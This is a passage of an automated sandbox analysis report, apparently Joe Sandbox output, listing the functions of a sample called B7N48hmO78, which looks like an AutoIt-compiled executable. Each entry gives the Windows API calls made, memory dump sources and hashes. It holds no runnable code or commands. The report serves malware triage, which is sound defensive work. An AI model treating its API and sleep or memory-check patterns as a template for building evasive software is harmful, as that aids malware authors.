                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2710830443-0
                                                                                                                  • Opcode ID: 24a36efafcc423fa03a2a7b29015458b181c911cba66123edab0076f22a66acd
                                                                                                                  • Instruction ID: f4c92e00a122cb5369c118b8f4e3cbd60ad887efe242c3a5df6e98fd91db88f4
                                                                                                                  • Opcode Fuzzy Hash: 24a36efafcc423fa03a2a7b29015458b181c911cba66123edab0076f22a66acd
                                                                                                                  • Instruction Fuzzy Hash: 15E030716452247ADB111BA2EC4DEDB7F1CEF067A1F408011F509E4460C6B19584C7E0
                                                                                                                  Function 00E1B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00E1B0D6
                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E1AC9D), ref: 00E1B0DD
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E1AC9D), ref: 00E1B0EA
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E1AC9D), ref: 00E1B0F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3974789173-0
                                                                                                                  • Opcode ID: 1a17ca471673ac243f504b9f0dd72604ff133d2fec54a2677ec1afb891799eb5
                                                                                                                  • Instruction ID: ecaeb9d3ff17d3fdd8899b79b53085cf8b44e12e5508c5fbcfee3191d962a31f
                                                                                                                  • Opcode Fuzzy Hash: 1a17ca471673ac243f504b9f0dd72604ff133d2fec54a2677ec1afb891799eb5
                                                                                                                  • Instruction Fuzzy Hash: 18E04F32B05212DFD7601FB36C0CB873BA9EF597D5F018818E241E6040DAA484458760
                                                                                                                  Function 00DFB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000008), ref: 00DFB496
                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00DFB4A0
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00DFB4B5
                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00DFB4BD
                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00E5DE2B
                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E5DE38
                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00E5DE51
                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00E5DE6A
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00E5DE8A
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00E5DE95
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1946975507-0
                                                                                                                  • Opcode ID: 97f1eee6dc02b0ef0ab46fb0edf9055c2a094de89b1b6bbf37ba6f70b7f4e828
                                                                                                                  • Instruction ID: 573187ea466039b5d1852c8d1be3530d6ff0f7256707e4f910c3265d657cf169
                                                                                                                  • Opcode Fuzzy Hash: 97f1eee6dc02b0ef0ab46fb0edf9055c2a094de89b1b6bbf37ba6f70b7f4e828
                                                                                                                  • Instruction Fuzzy Hash: 3BE06D31A08244AEDF211B65FC0DBD93B11AB1237AF04C726FA6A680E1C7F18988CB11
                                                                                                                  Function 00E5B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: debdc57ce0eab06d3041c1d9792ece4a0e5ec313e6ca6e57802745fa94662c99
                                                                                                                  • Instruction ID: 8ea8e73d227956458d56d592e2809d44f3d29539c7df88ce86cea6805c057cef
                                                                                                                  • Opcode Fuzzy Hash: debdc57ce0eab06d3041c1d9792ece4a0e5ec313e6ca6e57802745fa94662c99
                                                                                                                  • Instruction Fuzzy Hash: ABE01AB1A04208EFDB005F71EC4866E7BA5EB4C391F52C805FD5AA7250CAB498449F60
                                                                                                                  Function 00E5B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: f043eb968ed6f64bfaa9c329ac26f98008c93245b1e2257855117103d538d249
                                                                                                                  • Instruction ID: 91c57d09a65c954ac7596104eefedf671c572747d25ac1245f25f36daa317f2b
                                                                                                                  • Opcode Fuzzy Hash: f043eb968ed6f64bfaa9c329ac26f98008c93245b1e2257855117103d538d249
                                                                                                                  • Instruction Fuzzy Hash: 87E04FB1A04204EFDB005F71EC4C62E7BA5EB4C390F52C405FD5A97250CBB4D8048F20
                                                                                                                  Function 00E2290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy
                                                                                                                  • String ID: I/$I/
                                                                                                                  • API String ID: 3048848545-2526233121
                                                                                                                  • Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
                                                                                                                  • Instruction ID: a832f2477824c1bfa49a8d6d697f9ec21c76f398cc3616d2efe84f40e495f397
                                                                                                                  • Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
                                                                                                                  • Instruction Fuzzy Hash: 4C41E871900226BACF25EF99E4419FDB7B0EF58714F54605EFA81B7191DB309E82C760
                                                                                                                  Function 00DFBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00DFBCDA
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00DFBCF3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                  • Opcode ID: 2c84f3973fcba84510be2fc751c7aed84d4491f6901d504060e4839376338cd2
                                                                                                                  • Instruction ID: eb9e6e2526e73ebd31b010b7b7bbd5b9fe484a0087773230d7c659ec3228b436
                                                                                                                  • Opcode Fuzzy Hash: 2c84f3973fcba84510be2fc751c7aed84d4491f6901d504060e4839376338cd2
                                                                                                                  • Instruction Fuzzy Hash: CA5129714087489BE320AF14DC85BBFBBE8FB95354F42884EF6C8520A6DF71856C8766
                                                                                                                  Function 00E2C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE44ED: __fread_nolock.LIBCMT ref: 00DE450B
                                                                                                                  • _wcscmp.LIBCMT ref: 00E2C65D
                                                                                                                  • _wcscmp.LIBCMT ref: 00E2C670
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                  • String ID: FILE
                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                  • Opcode ID: 9c963d540ed30c4f8c832cc03f5c315f8f4e377623c701b459a272cb680925e7
                                                                                                                  • Instruction ID: 5cbffc1fbf6542f3de3ff03b36b645e06776d83128a57c524ed25195ba3900f4
                                                                                                                  • Opcode Fuzzy Hash: 9c963d540ed30c4f8c832cc03f5c315f8f4e377623c701b459a272cb680925e7
                                                                                                                  • Instruction Fuzzy Hash: E041B372B0025ABADF20ABA4DC41FEF77B9EF49714F101469F605FB181D6B19A048B61
                                                                                                                  Function 00E4A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E4A85A
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E4A86F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: '
                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                  • Opcode ID: 6de31b18afc0628867f6a090d9db661becfd5ff77219695c35df77b72568a0a3
                                                                                                                  • Instruction ID: 8a14d38278cb7b299dca6736b07b50f41f433cce7f5828cf434ec92ab0993490
                                                                                                                  • Opcode Fuzzy Hash: 6de31b18afc0628867f6a090d9db661becfd5ff77219695c35df77b72568a0a3
                                                                                                                  • Instruction Fuzzy Hash: 35411675E402099FDB14CF69D884BDA7BB9FB08314F18106AE905EB381D770A946CFA1
                                                                                                                  Function 00E4975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00E4980E
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E4984A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                  • Opcode ID: 7ae156656700ceb6af4638a293213717895c008b7ac5646a9ca6c58167ed1938
                                                                                                                  • Instruction ID: f4bc1acdde91f0963ed292e558a9e0dde565e890018556a79d92bc5e2b26ff5b
                                                                                                                  • Opcode Fuzzy Hash: 7ae156656700ceb6af4638a293213717895c008b7ac5646a9ca6c58167ed1938
                                                                                                                  • Instruction Fuzzy Hash: E631AF71510204AEEB149F38DC81BFB73A9FF9D764F009619F9A9E7191CA71AC81C760
                                                                                                                  Function 00E25157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E251C6
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E25201
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  • Opcode ID: e7cdc3662c3ee6510c00b1e3d9f28329706f0eba7e5841c4d9d883732e72cb5a
                                                                                                                  • Instruction ID: 5dfb54551d652b2c3ce9ef330a11cbc31ac609cc35c091f3c670b8b4de5d5444
                                                                                                                  • Opcode Fuzzy Hash: e7cdc3662c3ee6510c00b1e3d9f28329706f0eba7e5841c4d9d883732e72cb5a
                                                                                                                  • Instruction Fuzzy Hash: B1319333600724EBEB28CF99EA45BAEBBF4EF45354F146019E985B61F0E7709944CB20
                                                                                                                  Function 00E3658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __snwprintf
                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                  • API String ID: 2391506597-2584243854
                                                                                                                  • Opcode ID: 0367942c5517c228aa596914069b8aee5665a51213ea9688505c065ce4eac3f1
                                                                                                                  • Instruction ID: d6989d5c762a2f0622f799ebcffc746e950a9f415bf85e8be0acf0f91750ff3a
                                                                                                                  • Opcode Fuzzy Hash: 0367942c5517c228aa596914069b8aee5665a51213ea9688505c065ce4eac3f1
                                                                                                                  • Instruction Fuzzy Hash: 17218971600218BBCF11EFA5C882AEE77B4EF44784F1094A9F505BB195DB70EA45CBB1
                                                                                                                  Function 00E493CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E4945C
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E49467
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: Combobox
                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                  • Opcode ID: 52ee2ab7d7ffa9143876ada2534b4fbad9b1d9c1f8780c38c62d90ee66c5251f
                                                                                                                  • Instruction ID: 7a3e5686d591376e7a8b1ca1168c73e627a7b7bb05b9a3cfd168006f309cdefe
                                                                                                                  • Opcode Fuzzy Hash: 52ee2ab7d7ffa9143876ada2534b4fbad9b1d9c1f8780c38c62d90ee66c5251f
                                                                                                                  • Instruction Fuzzy Hash: D911B2B13002086FEF219E55ECC0EBB376FEB993A8F115125F929B72A1D6719C528760
                                                                                                                  Function 00E4DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • GetActiveWindow.USER32 ref: 00E4DA7B
                                                                                                                  • EnumChildWindows.USER32(?,00E4D75F,00000000), ref: 00E4DAF5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                  • String ID: T1
                                                                                                                  • API String ID: 3814560230-924183305
                                                                                                                  • Opcode ID: ec91a0350b0088f9f14fa7e3d1c783be5f039eacaf3f03d45b07a0c16220569f
                                                                                                                  • Instruction ID: b23235ccb501f605cbdc20c7542c2617f74f5893e22e103a9bc98db287b6d507
                                                                                                                  • Opcode Fuzzy Hash: ec91a0350b0088f9f14fa7e3d1c783be5f039eacaf3f03d45b07a0c16220569f
                                                                                                                  • Instruction Fuzzy Hash: C9216935608200DFC714DF29EC50AA677E5EF8A320F291259F96AE73E0C730B804CB60
                                                                                                                  Function 00E498FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
